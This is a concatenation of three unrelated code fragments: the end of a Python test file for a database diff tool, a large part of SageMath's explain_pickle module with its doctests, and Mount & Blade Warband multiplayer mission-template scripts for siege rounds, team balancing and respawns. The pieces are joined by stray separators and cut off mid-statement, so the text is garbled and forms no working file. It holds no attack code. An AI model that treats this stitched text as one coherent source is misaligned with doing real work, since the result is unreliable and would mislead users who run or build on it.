'y_table',
['join1', 'join2'],
100,
COMPARE_COLS,
True
)
logging.info(grouped_column_diffs)
data1_misses = 1
data2_misses = 2
expected = {'data1': {'count': data1_misses, 'df_shape': (data1_misses, 3),
'df_raw_shape': (data1_misses, 2 + len(join_cols)),
'df_h_x_shape': (5, 1 + len(join_cols)),
'df_h_y_shape': (5, 1 + len(join_cols))},
'data2': {'count': data2_misses, 'df_shape': (data2_misses, 3),
'df_raw_shape': (data2_misses, 2 + len(join_cols)),
'df_h_x_shape': (5, 1 + len(join_cols)),
'df_h_y_shape': (5, 1 + len(join_cols))}}
for column_name in expected.keys():
grouped_column_diffs[column_name]
logging.info(grouped_column_diffs[column_name])
assert expected[column_name]['count'] == grouped_column_diffs[column_name]['count']
for q_name in {'q', 'q_raw', 'q_h_x', 'q_h_y'}:
assert q_name in grouped_column_diffs[column_name]
for i in {0, 1}:
assert expected[column_name]['df_shape'][i] == grouped_column_diffs[column_name]['df'].shape[i]
assert expected[column_name]['df_raw_shape'][i] == grouped_column_diffs[column_name]['df_raw'].shape[i]
assert expected[column_name]['df_h_x_shape'][i] == grouped_column_diffs[column_name]['df_h_x'].shape[i]
assert expected[column_name]['df_h_y_shape'][i] == grouped_column_diffs[column_name]['df_h_y'].shape[i]
def test_drop_data_end(cur):
drop_schema(cur)
def test_main(cur):
create_schema(cur)
create_x_table(cur)
create_y_table(cur)
base_options = ['dbdiff', | |
raise ValueError("Not safe to evaluate code generated with default_assumptions")
from sage.misc.sage_eval import sage_eval
result = sage_eval(ans, preparse=preparse)
print(ans)
return result
else:
return ans
valid_name_re = re.compile('^[a-zA-Z_][a-zA-Z0-9_]*$')
def name_is_valid(name):
r"""
Test whether a string is a valid Python identifier. (We use a
conservative test, that only allows ASCII identifiers.)
EXAMPLES::
sage: from sage.misc.explain_pickle import name_is_valid
sage: name_is_valid('fred')
True
sage: name_is_valid('Yes!ValidName')
False
sage: name_is_valid('_happy_1234')
True
"""
# Technically, we also need to reject keywords...
return bool(valid_name_re.match(name))
# The pickle interpreter can push and pop "marks" on the stack.
# This string is used as the representation of a mark.
the_mark = 'mark'
class PickleObject(object):
r"""
Pickles have a stack-based virtual machine. The explain_pickle
pickle interpreter mostly uses SageInputExpressions, from sage_input,
as the stack values. However, sometimes we want some more information
about the value on the stack, so that we can generate better
(prettier, less confusing) code. In such cases, we push
a PickleObject instead of a SageInputExpression. A PickleObject
contains a value (which may be a standard Python value, or a
PickleDict or PickleInstance), an expression (a SageInputExpression),
and an "immutable" flag (which checks whether this object
has been converted to a SageInputExpression; if it has, then we
must not mutate the object, since the SageInputExpression would not
reflect the changes).
"""
def __init__(self, value, expression):
r"""
Construct a PickleObject.
TESTS::
sage: from sage.misc.explain_pickle import *
sage: v = PickleObject(1, 2)
sage: v.value
1
sage: v.expression
2
sage: v.immutable
False
"""
self.value = value
self.expression = expression
self.immutable = False
def _sage_input_(self, sib, coerced):
r"""
Extracts the expression from a PickleObject, and sets the immutable
flag.
TESTS::
sage: from sage.misc.explain_pickle import *
sage: v = PickleObject(1, 2)
sage: v.immutable
False
sage: v._sage_input_('sib', False)
2
sage: v.immutable
True
"""
self.immutable = True
return self.expression
class PickleDict(object):
r"""
An object which can be used as the value of a PickleObject. The items
is a list of key-value pairs, where the keys and values are
SageInputExpressions. We use this to help construct dictionary literals,
instead of always starting with an empty dictionary and assigning to
it.
"""
def __init__(self, items):
r"""
Initialize a PickleDict.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: PickleDict([('a', 1)]).items
[('a', 1)]
"""
self.items = items
class PickleInstance(object):
r"""
An object which can be used as the value of a PickleObject. Unlike
other possible values of a PickleObject, a PickleInstance doesn't represent
an exact value; instead, it gives the class (type) of the object.
"""
def __init__(self, klass):
r"""
Initialize a PickleInstance.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: PickleInstance(Integer).klass
<type 'sage.rings.integer.Integer'>
"""
self.klass = klass
class PickleExplainer(object):
r"""
An interpreter for the pickle virtual machine, that executes
symbolically and constructs SageInputExpressions instead of
directly constructing values.
"""
def __init__(self, sib, in_current_sage=False, default_assumptions=False,
pedantic=False):
r"""
Initialize a PickleExplainer interpreter for the pickle virtual machine.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: pe = PickleExplainer(SageInputBuilder(), in_current_sage=True, default_assumptions=False, pedantic=True)
sage: pe.in_current_sage
True
sage: pe.pedantic
True
"""
self.sib = sib
self.in_current_sage = in_current_sage
self.default_assumptions = default_assumptions
self.pedantic = pedantic
self.stopped = False
self.stack = []
self.memo = {}
if in_current_sage and default_assumptions:
raise ValueError("in_current_sage and default_assumptions must not both be true")
self.new_instance = self.sib.import_name('types', 'InstanceType')
def run_pickle(self, p):
r"""
Given an (uncompressed) pickle as a string, run the pickle
in this virtual machine. Once a STOP has been executed, return
the result (a SageInputExpression representing code which, when
evaluated, will give the value of the pickle).
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: sib(pe.run_pickle('T\5\0\0\0hello.')) # py2
{atomic:'hello'}
"""
for (op, arg, pos) in genops(p):
assert(not(self.stopped))
try:
handler = getattr(self, op.name)
except AttributeError:
raise NotImplementedError('PickleExplainer does not yet handle opcode %s' % op.name)
if arg is None:
handler()
else:
handler(arg)
assert(self.stopped)
assert(len(self.stack) == 1)
return self.stack[0]
def check_value(self, v):
r"""
Check that the given value is either a SageInputExpression or a
PickleObject. Used for internal sanity checking.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: pe.check_value(7)
Traceback (most recent call last):
...
AssertionError
sage: pe.check_value(sib(7))
"""
assert(isinstance(v, (SageInputExpression, PickleObject)))
def push(self, v):
r"""
Push a value onto the virtual machine's stack.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: pe.push(sib(7))
sage: pe.stack[-1]
{atomic:7}
"""
self.check_value(v)
self.stack.append(v)
def push_and_share(self, v):
r"""
Push a value onto the virtual machine's stack; also mark it as shared
for sage_input if we are in pedantic mode.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: pe.push_and_share(sib(7))
sage: pe.stack[-1]
{atomic:7}
sage: pe.stack[-1]._sie_share
True
"""
self.share(v)
self.push(v)
def pop(self):
r"""
Pop a value from the virtual machine's stack, and return it.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: pe.push(sib(7))
sage: pe.pop()
{atomic:7}
"""
v = self.stack.pop()
self.check_value(v)
return v
def push_mark(self):
r"""
Push a 'mark' onto the virtual machine's stack.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: pe.push_mark()
sage: pe.stack[-1]
'mark'
sage: pe.stack[-1] is the_mark
True
"""
self.stack.append(the_mark)
def pop_to_mark(self):
r"""
Pop all values down to the 'mark' from the virtual machine's stack,
and return the values as a list.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: pe.push_mark()
sage: pe.push(sib(7))
sage: pe.push(sib('hello'))
sage: pe.pop_to_mark()
[{atomic:7}, {atomic:'hello'}]
"""
slice = []
while True:
v = self.stack.pop()
if v is the_mark:
slice.reverse()
return slice
self.check_value(v)
slice.append(v)
def share(self, v):
r"""
Mark a sage_input value as shared, if we are in pedantic mode.
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: v = sib(7)
sage: v._sie_share
False
sage: pe.share(v)
{atomic:7}
sage: v._sie_share
True
"""
if self.pedantic:
self.sib.share(v)
return v
def is_mutable_pickle_object(self, v):
r"""
Test whether a PickleObject is mutable (has never been converted
to a SageInputExpression).
EXAMPLES::
sage: from sage.misc.explain_pickle import *
sage: from sage.misc.sage_input import SageInputBuilder
sage: sib = SageInputBuilder()
sage: pe = PickleExplainer(sib, in_current_sage=True, default_assumptions=False, pedantic=True)
sage: v = PickleObject(1, sib(1))
sage: pe.is_mutable_pickle_object(v)
True
sage: sib(v)
{atomic:1}
sage: pe.is_mutable_pickle_object(v)
False
"""
return isinstance(v, PickleObject) and not v.immutable
# Opcodes are in alphabetical order
def APPEND(self):
r"""
TESTS::
sage: from sage.misc.explain_pickle import *
sage: test_pickle(['a']) # py2
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 1
5: U SHORT_BINSTRING 'a'
8: a APPEND
9: . STOP
highest protocol among opcodes = 2
explain_pickle in_current_sage=True/False:
['a']
result: ['a']
As shown above, we prefer to create a list literal. This is not
possible if the list is recursive::
sage: v = []
sage: v.append(v)
sage: test_pickle(v) # py2
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 1
5: h BINGET 1
7: a APPEND
8: . STOP
highest protocol among opcodes = 2
explain_pickle in_current_sage=True/False:
si = []
list.append(si, si)
si
result: [[...]]
"""
obj = self.pop()
lst = self.pop()
self._APPENDS_helper(lst, [obj])
def APPENDS(self):
r"""
TESTS::
sage: from sage.misc.explain_pickle import *
sage: test_pickle(['a', 'b']) # py2
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 1
5: ( MARK
6: U SHORT_BINSTRING 'a'
9: U SHORT_BINSTRING 'b'
12: e APPENDS (MARK at 5)
13: . STOP
highest protocol among opcodes = 2
explain_pickle in_current_sage=True/False:
['a', 'b']
result: ['a', 'b']
As shown above, we prefer to create a list literal. This is not
possible if the list is recursive::
sage: v = []
sage: v.append(v)
sage: v.append(v)
sage: test_pickle(v) # py2
0: \x80 | |
(multiplayer_send_2_int_to_player, ":cur_player", multiplayer_event_set_team_score, ":team_2_score", ":team_1_score"),
(call_script, "script_multiplayer_server_swap_player", ":cur_player"),
(try_end),
(try_end),
# Vincenzo end
#auto team balance control at the end of round
(assign, ":number_of_players_at_team_1", 0),
(assign, ":number_of_players_at_team_2", 0),
(try_for_range, ":cur_player", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":cur_player"),
(player_get_team_no, ":player_team", ":cur_player"),
(try_begin),
(eq, ":player_team", 0),
(val_add, ":number_of_players_at_team_1", 1),
(else_try),
(eq, ":player_team", 1),
(val_add, ":number_of_players_at_team_2", 1),
(try_end),
(try_end),
#end of counting active players per team.
(store_sub, ":difference_of_number_of_players", ":number_of_players_at_team_1", ":number_of_players_at_team_2"),
(assign, ":number_of_players_will_be_moved", 0),
(try_begin),
(try_begin),
(store_mul, ":checked_value", "$g_multiplayer_auto_team_balance_limit", -1),
(le, ":difference_of_number_of_players", ":checked_value"),
(store_div, ":number_of_players_will_be_moved", ":difference_of_number_of_players", -2),
(assign, ":team_with_more_players", 1),
(assign, ":team_with_less_players", 0),
(else_try),
(ge, ":difference_of_number_of_players", "$g_multiplayer_auto_team_balance_limit"),
(store_div, ":number_of_players_will_be_moved", ":difference_of_number_of_players", 2),
(assign, ":team_with_more_players", 0),
(assign, ":team_with_less_players", 1),
(try_end),
(try_end),
#number of players will be moved calculated. (it is 0 if no need to make team balance)
(try_begin),
(gt, ":number_of_players_will_be_moved", 0),
(try_begin),
(try_for_range, ":unused", 0, ":number_of_players_will_be_moved"),
(assign, ":max_player_join_time", 0),
(assign, ":latest_joined_player_no", -1),
(try_for_range, ":player_no", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(player_get_team_no, ":player_team", ":player_no"),
(eq, ":player_team", ":team_with_more_players"),
(player_get_slot, ":player_join_time", ":player_no", slot_player_join_time),
(try_begin),
(gt, ":player_join_time", ":max_player_join_time"),
(assign, ":max_player_join_time", ":player_join_time"),
(assign, ":latest_joined_player_no", ":player_no"),
(try_end),
(try_end),
(try_begin),
(ge, ":latest_joined_player_no", 0),
(try_begin),
#if player is living add +1 to his kill count because he will get -1 because of team change while living.
(player_get_agent_id, ":latest_joined_agent_id", ":latest_joined_player_no"),
(ge, ":latest_joined_agent_id", 0),
(agent_is_alive, ":latest_joined_agent_id"),
(player_get_kill_count, ":player_kill_count", ":latest_joined_player_no"), #adding 1 to his kill count, because he will lose 1 undeserved kill count for dying during team change
(val_add, ":player_kill_count", 1),
(player_set_kill_count, ":latest_joined_player_no", ":player_kill_count"),
(player_get_death_count, ":player_death_count", ":latest_joined_player_no"), #subtracting 1 to his death count, because he will gain 1 undeserved death count for dying during team change
(val_sub, ":player_death_count", 1),
(player_set_death_count, ":latest_joined_player_no", ":player_death_count"),
(player_get_score, ":player_score", ":latest_joined_player_no"), #adding 1 to his score count, because he will lose 1 undeserved score for dying during team change
(val_add, ":player_score", 1),
(player_set_score, ":latest_joined_player_no", ":player_score"),
(try_for_range, ":player_no", 1, multiplayer_player_loops_end), #0 is server so starting from 1
(player_is_active, ":player_no"),
(multiplayer_send_4_int_to_player, ":player_no", multiplayer_event_set_player_score_kill_death, ":latest_joined_player_no", ":player_score", ":player_kill_count", ":player_death_count"),
(try_end),
(try_end),
(player_set_troop_id, ":latest_joined_player_no", -1),
(player_set_team_no, ":latest_joined_player_no", ":team_with_less_players"),
(multiplayer_send_message_to_player, ":latest_joined_player_no", multiplayer_event_force_start_team_selection),
(try_end),
(try_end),
#tutorial message (after team balance)
#(tutorial_message_set_position, 500, 500),
#(tutorial_message_set_size, 30, 30),
#(tutorial_message_set_center_justify, 1),
#(tutorial_message, "str_auto_team_balance_done", 0xFFFFFFFF, 5),
#for only server itself
(call_script, "script_show_multiplayer_message", multiplayer_message_type_auto_team_balance_done, 0),
#no need to send also server here
(try_for_range, ":player_no", 1, multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(multiplayer_send_int_to_player, ":player_no", multiplayer_event_show_multiplayer_message, multiplayer_message_type_auto_team_balance_done),
(try_end),
(assign, "$g_team_balance_next_round", 0),
(try_end),
(try_end),
#team balance check part finished
(assign, "$g_team_balance_next_round", 0),
(try_for_range, ":player_no", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(player_set_slot, ":player_no", slot_player_spawned_this_round, 0),
(player_set_slot, ":player_no", slot_player_spawned_at_siege_round, 0),
# AoN
(neq,":player_no",0),
(multiplayer_send_message_to_player, ":player_no", multiplayer_event_return_before_round_end),
(try_end),
#initialize my team at start of round (it will be assigned again at next round's first death)
(assign, "$my_team_at_start_of_round", -1),
(call_script, "script_multiplayer_mm_reset_stuff_after_round_before_clear"),
#clear scene and end round
(multiplayer_clear_scene),
#assigning everbody's spawn counts to 0
(assign, "$g_my_spawn_count", 0),
(try_for_range, ":player_no", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(player_set_slot, ":player_no", slot_player_spawn_count, 0),
(try_end),
(call_script, "script_initialize_objects"),
#initialize moveable object positions
(call_script, "script_multiplayer_initialize_belfry_wheel_rotations"),
(call_script, "script_multiplayer_close_gate_if_it_is_open"),
(call_script, "script_multiplayer_move_moveable_objects_initial_positions"),
#initialize flag coordinates (move up the flag at pole)
(try_for_range, ":flag_no", 0, "$g_number_of_flags"),
(scene_prop_get_instance, ":pole_id", "spr_headquarters_pole_code_only", ":flag_no"),
(prop_instance_get_position, pos1, ":pole_id"),
(position_move_z, pos1, multi_headquarters_pole_height),
(scene_prop_get_instance, ":flag_id", "$team_1_flag_scene_prop", ":flag_no"),
(prop_instance_stop_animating, ":flag_id"),
(prop_instance_set_position, ":flag_id", pos1),
(try_end),
(assign, "$g_round_ended", 0),
(store_mission_timer_a, "$g_round_start_time"),
(call_script, "script_initialize_all_scene_prop_slots"),
#initialize round start time for clients
(try_for_range, ":player_no", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(multiplayer_send_int_to_player, ":player_no", multiplayer_event_set_round_start_time, -9999),
(try_end),
(assign, "$g_flag_is_not_ready", 0),
#MM
(call_script, "script_multiplayer_mm_reset_stuff_after_round"),
]),
(1, 0, 0, [(multiplayer_is_server),],
[
(store_mission_timer_a, ":round_time"),
(val_sub, ":round_time", "$g_round_start_time"),
(assign, ":num_active_players_in_team_0", 0),
(assign, ":num_active_players_in_team_1", 0),
(assign, ":num_active_players", 0),
(try_for_range, ":cur_player", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":cur_player"),
(player_get_team_no, ":cur_player_team", ":cur_player"),
(try_begin),
(eq, ":cur_player_team", 0),
(val_add, ":num_active_players_in_team_0", 1),
(else_try),
(eq, ":cur_player_team", 1),
(val_add, ":num_active_players_in_team_1", 1),
(try_end),
(val_add, ":num_active_players", 1),
(try_end),
(try_for_range, ":player_no", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(player_slot_eq, ":player_no", slot_player_spawned_this_round, 0),
(neg|player_is_busy_with_menus, ":player_no"),
(player_get_team_no, ":player_team", ":player_no"), #if player is currently spectator do not spawn his agent
(lt, ":player_team", multi_team_spectator),
(player_get_troop_id, ":player_troop", ":player_no"), #if troop is not selected do not spawn his agent
(ge, ":player_troop", 0),
(player_get_agent_id, ":player_agent", ":player_no"), #new added for siege mod
(assign, ":spawn_new", 0),
(try_begin),
(eq, "$g_round_ended", 0),
(try_begin), #addition for siege mod to allow players spawn more than once (begin)
(lt, ":player_agent", 0),
(try_begin), #new added begin, to avoid siege-crack (rejoining of defenders when they die)
(eq, ":player_team", 0),
(player_get_slot, ":player_last_team_select_time", ":player_no", slot_player_last_team_select_time),
(store_mission_timer_a, ":current_time"),
(store_sub, ":elapsed_time", ":current_time", ":player_last_team_select_time"),
(assign, ":player_team_respawn_period", "$g_multiplayer_respawn_period"),
(val_add, ":player_team_respawn_period", multiplayer_siege_mod_defender_team_extra_respawn_time), #new added for siege mod
(lt, ":elapsed_time", ":player_team_respawn_period"),
#(store_sub, ":round_time", ":current_time", "$g_round_start_time"),
(ge, ":round_time", multiplayer_new_agents_finish_spawning_time),
(gt, ":num_active_players", 2),
(store_mul, ":multipication_of_num_active_players_in_teams", ":num_active_players_in_team_0", ":num_active_players_in_team_1"),
(neq, ":multipication_of_num_active_players_in_teams", 0),
(assign, ":spawn_new", 0),
(else_try), #new added end
(assign, ":spawn_new", 1),
(try_end),
(else_try),
(agent_get_time_elapsed_since_removed, ":elapsed_time", ":player_agent"),
(assign, ":player_team_respawn_period", "$g_multiplayer_respawn_period"),
(try_begin),
(eq, ":player_team", 0),
(val_add, ":player_team_respawn_period", multiplayer_siege_mod_defender_team_extra_respawn_time),
(try_end),
(this_or_next|gt, ":elapsed_time", ":player_team_respawn_period"),
(player_slot_eq, ":player_no", slot_player_spawned_at_siege_round, 0),
(assign, ":spawn_new", 1),
(try_end),
(try_end), #addition for siege mod to allow players spawn more than once (end)
(eq, ":spawn_new", 1),
(player_get_slot, ":spawn_count", ":player_no", slot_player_spawn_count),
(try_begin),
(gt, "$g_multiplayer_number_of_respawn_count", 0),
(try_begin),
(eq, ":player_team", 0),
(ge, ":spawn_count", "$g_multiplayer_number_of_respawn_count"),
(assign, ":spawn_new", 0),
(else_try),
(eq, ":player_team", 1),
(ge, ":spawn_count", 999),
(assign, ":spawn_new", 0),
(try_end),
(try_end),
(eq, ":spawn_new", 1),
(call_script, "script_multiplayer_buy_agent_equipment", ":player_no"),
(val_add, ":spawn_count", 1),
(try_begin),
(ge, ":spawn_count", "$g_multiplayer_number_of_respawn_count"),
(gt, "$g_multiplayer_number_of_respawn_count", 0),
(eq, ":player_team", 0),
(assign, ":spawn_count", 999),
(try_end),
(player_set_slot, ":player_no", slot_player_spawn_count, ":spawn_count"),
(try_begin),
(lt, ":round_time", 30), #at start of round spawn at base entry point (only attackers)
(eq, ":player_team", 1),
(assign, ":entry_no", multi_initial_spawn_point_team_2),
(else_try),
(eq, ":player_team", 0), #Defenders
(store_random_in_range, ":entry_no", 0, 32), # Spawn at random defender spawn (0-31)
(else_try),
(eq, ":player_team", 1), #Attackers
(store_random_in_range, ":entry_no", 32, 64), # Spawn at random attacker spawn (32-63)
(try_end),
(player_spawn_new_agent, ":player_no", ":entry_no"),
(player_set_slot, ":player_no", slot_player_spawned_this_round, 1),
(player_set_slot, ":player_no", slot_player_spawned_at_siege_round, 1),
(try_end),
]),
(1, 0, 0, [ (multiplayer_is_server),
(this_or_next|gt,"$g_multiplayer_num_bots_team_1",0),
(gt,"$g_multiplayer_num_bots_team_2",0), # are there any bots? :p
(store_mission_timer_a, ":mission_timer"),
(ge, ":mission_timer", 2)
], #do this in every new frame, but not at the same time
[
(assign, ":team_1_count", 0),
(assign, ":team_2_count", 0),
(try_for_agents, ":cur_agent"),
(agent_is_active, ":cur_agent"),
(agent_is_non_player, ":cur_agent"),
(agent_is_human, ":cur_agent"),
(assign, ":will_be_counted", 0),
(try_begin),
(agent_is_alive, ":cur_agent"),
(assign, ":will_be_counted", 1), #alive so will be counted
(else_try),
(agent_get_time_elapsed_since_removed, ":elapsed_time", ":cur_agent"),
(le, ":elapsed_time", "$g_multiplayer_respawn_period"),
(assign, ":will_be_counted", 1),
(try_end),
(eq, ":will_be_counted", 1),
(agent_get_team, ":cur_team", ":cur_agent"),
(try_begin),
(eq, ":cur_team", 0),
(val_add, ":team_1_count", 1),
(else_try),
(eq, ":cur_team", 1),
(val_add, ":team_2_count", 1),
(try_end),
(try_end),
(store_sub, "$g_multiplayer_num_bots_required_team_1", "$g_multiplayer_num_bots_team_1", ":team_1_count"),
(store_sub, "$g_multiplayer_num_bots_required_team_2", "$g_multiplayer_num_bots_team_2", ":team_2_count"),
(val_max, "$g_multiplayer_num_bots_required_team_1", 0),
(val_max, "$g_multiplayer_num_bots_required_team_2", 0),
]),
multiplayer_server_spawn_bots,
multiplayer_server_manage_bots,
multiplayer_server_check_end_map,
(ti_tab_pressed, 0, 0, [],
[
(try_begin),
(eq, "$g_multiplayer_mission_end_screen", 0),
(assign, "$g_multiplayer_stats_chart_opened_manually", 1),
(start_presentation, "prsnt_multiplayer_stats_chart"),
(try_end),
]),
multiplayer_once_at_the_first_frame,
(ti_escape_pressed, 0, 0, [],
[
(neg|is_presentation_active, "prsnt_multiplayer_escape_menu"),
(neg|is_presentation_active, "prsnt_multiplayer_stats_chart"),
(eq, "$g_waiting_for_confirmation_to_terminate", 0),
(start_presentation, "prsnt_multiplayer_escape_menu"),
]),
] + mm_multiplayer_common,
),
(
"multiplayer_bt",mtf_battle_mode,-1, #battle mode
"You lead your men to battle.",
[
(0,mtef_visitor_source|mtef_team_0|mtef_no_auto_reset,0,aif_start_alarmed,1,[]),
(1,mtef_visitor_source|mtef_team_0|mtef_no_auto_reset,0,aif_start_alarmed,1,[]),
(2,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(3,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(4,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(5,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(6,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(7,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(8,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(9,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(10,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(11,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(12,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(13,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(14,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(15,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(16,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(17,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(18,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(19,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(20,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(21,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(22,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(23,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(24,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(25,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(26,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(27,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(28,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(29,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(30,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(31,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(32,mtef_visitor_source|mtef_team_0|mtef_no_auto_reset,0,aif_start_alarmed,1,[]),
(33,mtef_visitor_source|mtef_team_0|mtef_no_auto_reset,0,aif_start_alarmed,1,[]),
(34,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(35,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(36,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(37,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(38,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(39,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(40,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(41,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(42,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(43,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(44,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(45,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(46,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(47,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(48,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(49,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(50,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(51,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(52,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(53,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(54,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(55,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(56,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(57,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(58,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(59,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(60,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(61,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(62,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(63,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
],
[
common_battle_init_banner,
multiplayer_server_check_polls,
multiplayer_server_bonuses,
(ti_server_player_joined, 0, 0, [],
[
(store_trigger_param_1, ":player_no"),
(call_script, "script_multiplayer_server_player_joined_common", ":player_no"),
]),
(ti_before_mission_start, 0, 0, [],
[
(assign, "$g_multiplayer_game_type", multiplayer_game_type_battle),
(call_script, "script_multiplayer_server_before_mission_start_common"),
(assign, "$g_waiting_for_confirmation_to_terminate", 0),
(assign, "$g_round_ended", 0),
(try_begin),
(multiplayer_is_server),
(assign, "$server_mission_timer_while_player_joined", 0),
(assign, "$g_round_start_time", 0),
(try_end),
(assign, "$my_team_at_start_of_round", -1),
(call_script, "script_multiplayer_init_mission_variables"),
(call_script, "script_multiplayer_remove_headquarters_flags"),
#MM
(call_script, "script_multiplayer_mm_before_mission_start_common"),
]),
(ti_after_mission_start, 0, 0, [],
[
(call_script, "script_determine_team_flags", 0),
(call_script, "script_determine_team_flags", 1),
(set_spawn_effector_scene_prop_kind, 0, -1), #during this mission, agents of "team 0" will try to spawn around scene props with kind equal to -1(no effector for this mod)
(set_spawn_effector_scene_prop_kind, 1, -1), #during this mission, agents of "team 1" will try to spawn around scene props with kind equal to -1(no effector for this mod)
(try_begin),
(multiplayer_is_server),
